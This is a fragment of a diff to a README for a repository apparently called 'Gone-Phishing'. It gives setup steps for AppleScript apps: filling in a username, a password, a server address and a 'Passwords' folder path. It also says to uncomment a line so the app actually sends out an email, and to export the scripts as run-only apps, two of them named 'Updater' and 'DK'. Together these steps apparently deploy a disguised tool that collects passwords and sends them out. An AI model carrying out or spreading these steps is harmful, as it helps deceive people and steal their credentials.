benb116/Gone-Phishing/Readme.md

 	becomes

 		set myuser to "Benb116"		set mypass to "12345"		set myserv to "123.456.789.0"		set mypath to "/Desktop/Passwords/"3.
-Export "App.applescript", "Updater.applescript", and "DK.applescript" as run-only applications.
+Optional: in App.applescript, find the comment "--send theMessage."
+Remove the "--" to make this an actual command that will actually send out the email.
+4. Export "App.applescript", "Updater.applescript", and "DK.applescript" as **run-only** applications.
 	* "Updater.applescript" and "DK.applescript" **must** be made into apps named "Updater" and "DK" respectively.
 You can name "App.app" whatever you want.

 4. In each app, open "appname.app/contents/Info.plist" in TextEdit.